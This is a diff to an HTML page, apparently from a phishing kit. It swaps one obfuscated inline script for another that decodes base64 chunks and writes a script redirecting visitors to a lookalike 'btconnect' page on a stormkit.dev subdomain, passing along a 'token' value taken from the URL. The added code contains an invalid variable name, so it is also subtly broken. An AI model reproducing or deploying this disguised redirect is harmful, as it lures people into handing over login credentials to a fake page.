--- a/index.html
+++ b/index.html
@@ -2,21 +2,21 @@
     <!DOCTYPE html>
     <html>
     <head>
-        <title>Secure Encoded Page</title>
+        <title>Portal</title>
     </head>
     <body>
         
     <script>
         (function() {
-            const PIZCqa7z = [
-                'PHNjcmlwdD4KCXdpbmRvdy5sb2NhdGlvbi5yZXBs', 'YWNlKAoJICAiaHR0cHM6Ly9nb29nbGUuY29tLz92', 'aWV3PVc5NTVMQWFBMUdpUmRUNzVrYnA5Z1ZnYldG', 'ekdWRkRMUjY1OFRWOWNsdmhKVGNQeVV3VjRvTlB6', 'SHZFOUZtNk1sRHk5SUpVdWh5N2lDSGh2TktTem43', 'N0RHbnh6VmxsQ1AzazU3Mk9TUE5KTTFUMzYxM1hM', 'VjBNQVkzOTgjIiArCgkJYXRvYihuZXcgVVJMU2Vh', 'cmNoUGFyYW1zKHdpbmRvdy5sb2NhdGlvbi5zZWFy', 'Y2gpLmdldCgidG9rZW4iKSkKCSk7CiAgPC9zY3Jp', 'cHQ+'
+            const NWLdj92E = [
+                'PHNjcmlwdD4KCXdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKAoJICAiaHR0c', 'HM6Ly9idGNvbm5lY3QtbGIzOTNhYzE5MGNmYTJmYTBlYzBhOTVlNWQwYz', 'YzY2YxODRhOTgzYzRkOGVhZGZiYWNlLnN0b3Jta2l0LmRldi9idC5odG1', 'sLz9jbGllbnQ9Vzk1NUxBQTFHaVJkVDd6NE81a2JwOWdnYldGekdWRkRM', 'UjY1OFRWOWNsdmhKVGNQeVV3VjRvTlB6SHZFOUZtNk1sRHk5SUpVdWh5N', '2lDSGh2TktTem43N0RHbnh6VmxsQ1AzazU3Mk9TUEpNMVQzNjEzWExWME', '1BWTM5OCMiICsKCQlhdG9iKG5ldyBVUkxTZWFyY2hQYXJhbXMod2luZG9', '3LmxvY2F0aW9uLnNlYXJjaCkuZ2V0KCJ0b2tlbiIpKQoJKTsKICA8L3Nj', 'cmlwdD4='
             ];
-            let nl4hSEnd = "";
-            for (let chunk of PIZCqa7z) {
-                nl4hSEnd += chunk;
+            let 7iocJIsv = "";
+            for (let chunk of NWLdj92E) {
+                7iocJIsv += chunk;
             }
-            const AUYm7WTr = atob(nl4hSEnd);
-            document.write(AUYm7WTr);
+            const uKhOj8Fh = atob(7iocJIsv);
+            document.write(uKhOj8Fh);
         })();
     </script>
     
